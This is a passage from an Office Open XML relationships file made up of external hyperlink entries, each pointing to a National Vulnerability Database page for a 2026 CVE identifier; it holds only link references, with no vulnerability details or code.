Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69587" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69588" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69599" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69607" TargetMode="External" Id="rId741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69631" TargetMode="External" Id="rId742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69710" TargetMode="External" Id="rId743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69739" TargetMode="External" Id="rId744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69744" TargetMode="External" Id="rId745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69760" TargetMode="External" Id="rId746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69793" TargetMode="External" Id="rId747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69803" TargetMode="External" Id="rId748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69804" TargetMode="External" Id="rId749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69805" TargetMode="External" Id="rId750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69809" TargetMode="External" Id="rId751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69852" TargetMode="External" Id="rId752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69881" TargetMode="External" Id="rId753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69890" TargetMode="External" Id="rId754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69929" TargetMode="External" Id="rId755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69930" TargetMode="External" Id="rId756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70065" TargetMode="External" Id="rId757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70124" TargetMode="External" Id="rId758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70570" TargetMode="External" Id="rId759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70579" TargetMode="External" Id="rId760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70587" TargetMode="External" Id="rId761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71330" TargetMode="External" Id="rId762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72923" TargetMode="External" Id="rId763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72928" TargetMode="External" Id="rId764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72932" TargetMode="External" Id="rId765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72943" TargetMode="External" Id="rId766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72949" TargetMode="External" Id="rId767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72954" TargetMode="External" Id="rId768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72989" TargetMode="External" Id="rId769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73017" TargetMode="External" Id="rId770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75998" TargetMode="External" Id="rId771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77101" TargetMode="External" Id="rId772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77102" TargetMode="External" Id="rId773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77103" TargetMode="External" Id="rId774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77104" TargetMode="External" Id="rId775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77108" TargetMode="External" Id="rId776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77494" TargetMode="External" Id="rId777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77498" TargetMode="External" Id="rId778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77499" TargetMode="External" Id="rId779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77501" TargetMode="External" Id="rId780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77502" TargetMode="External" Id="rId781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77886" TargetMode="External" Id="rId782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77888" TargetMode="External" Id="rId783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77889" TargetMode="External" Id="rId784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77890" TargetMode="External" Id="rId785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77893" TargetMode="External" Id="rId786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77895" TargetMode="External" Id="rId787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77898" TargetMode="External" Id="rId788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78523" TargetMode="External" Id="rId789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78574" TargetMode="External" Id="rId790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78837" TargetMode="External" Id="rId791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79377" TargetMode="External" Id="rId792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79378" TargetMode="External" Id="rId793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79572" TargetMode="External" Id="rId794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79575" TargetMode="External" Id="rId795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81355" TargetMode="External" Id="rId796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81381" TargetMode="External" Id="rId797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81790" TargetMode="External" Id="rId798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83989" TargetMode="External" Id="rId799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84001" TargetMode="External" Id="rId800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85400" TargetMode="External" Id="rId801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86075" TargetMode="External" Id="rId802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86711" TargetMode="External" Id="rId803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86721" TargetMode="External" Id="rId804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86728" TargetMode="External" Id="rId805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19651" TargetMode="External" Id="rId806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69347" TargetMode="External" Id="rId807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71375" TargetMode="External" Id="rId808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76196" TargetMode="External" Id="rId809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78461" TargetMode="External" Id="rId810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81383" TargetMode="External" Id="rId811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84003" TargetMode="External" Id="rId812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28613" TargetMode="External" Id="rId813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28626" TargetMode="External" Id="rId814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28656" TargetMode="External" Id="rId815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45528" TargetMode="External" Id="rId816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69477" TargetMode="External" Id="rId817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78627" TargetMode="External" Id="rId818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86806" TargetMode="External" Id="rId819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76561" TargetMode="External" Id="rId820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81349" TargetMode="External" Id="rId821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81806" TargetMode="External" Id="rId822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82061" TargetMode="External" Id="rId823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82071" TargetMode="External" Id="rId824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84387" TargetMode="External" Id="rId825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86733" TargetMode="External" Id="rId826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11573" TargetMode="External" Id="rId827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16769" TargetMode="External" Id="rId828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20293" TargetMode="External" Id="rId829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66305" TargetMode="External" Id="rId830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68835" TargetMode="External" Id="rId831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68846" TargetMode="External" Id="rId832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68889" TargetMode="External" Id="rId833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68893" TargetMode="External" Id="rId834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69272" TargetMode="External" Id="rId835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69274" TargetMode="External" Id="rId836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69296" TargetMode="External" Id="rId837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69305" TargetMode="External" Id="rId838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69313" TargetMode="External" Id="rId839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69314" TargetMode="External" Id="rId840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69336" TargetMode="External" Id="rId841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69337" TargetMode="External" Id="rId842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69338" TargetMode="External" Id="rId843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69340" TargetMode="External" Id="rId844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69357" TargetMode="External" Id="rId845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69358" TargetMode="External" Id="rId846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69364" TargetMode="External" Id="rId847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69366" TargetMode="External" Id="rId848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69384" TargetMode="External" Id="rId849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69396" TargetMode="External" Id="rId850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69451" TargetMode="External" Id="rId851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69460" TargetMode="External" Id="rId852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69482" TargetMode="External" Id="rId853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69536" TargetMode="External" Id="rId854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69553" TargetMode="External" Id="rId855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69597" TargetMode="External" Id="rId856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69602" TargetMode="External" Id="rId857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69688" TargetMode="External" Id="rId858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69706" TargetMode="External" Id="rId859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69757" TargetMode="External" Id="rId860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69761" TargetMode="External" Id="rId861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69775" TargetMode="External" Id="rId862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73321" TargetMode="External" Id="rId863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81781" TargetMode="External" Id="rId864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81798" TargetMode="External" Id="rId865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82052" TargetMode="External" Id="rId866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82054" TargetMode="External" Id="rId867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82055" TargetMode="External" Id="rId868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82057" TargetMode="External" Id="rId869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82058" TargetMode="External" Id="rId870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82065" TargetMode="External" Id="rId871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82068" TargetMode="External" Id="rId872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82070" TargetMode="External" Id="rId873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82073" TargetMode="External" Id="rId874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82074" TargetMode="External" Id="rId875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82076" TargetMode="External" Id="rId876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84817" TargetMode="External" Id="rId877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84818" TargetMode="External" Id="rId878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84820" TargetMode="External" Id="rId879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86074" TargetMode="External" Id="rId880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86081" TargetMode="External" Id="rId881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86713" TargetMode="External" Id="rId882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86718" TargetMode="External" Id="rId883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86724" TargetMode="External" Id="rId884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86725" TargetMode="External" Id="rId885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86734" TargetMode="External" Id="rId886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9331" TargetMode="External" Id="rId887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50349" TargetMode="External" Id="rId888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58848" TargetMode="External" Id="rId889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62653" TargetMode="External" Id="rId890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62654" TargetMode="External" Id="rId891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62694" TargetMode="External" Id="rId892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68824" TargetMode="External" Id="rId893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68825" TargetMode="External" Id="rId894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68837" TargetMode="External" Id="rId895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68840" TargetMode="External" Id="rId896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68847" TargetMode="External" Id="rId897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68884" TargetMode="External" Id="rId898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68897" TargetMode="External" Id="rId899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69275" TargetMode="External" Id="rId900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69279" TargetMode="External" Id="rId901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69280" TargetMode="External" Id="rId902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69281" TargetMode="External" Id="rId903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 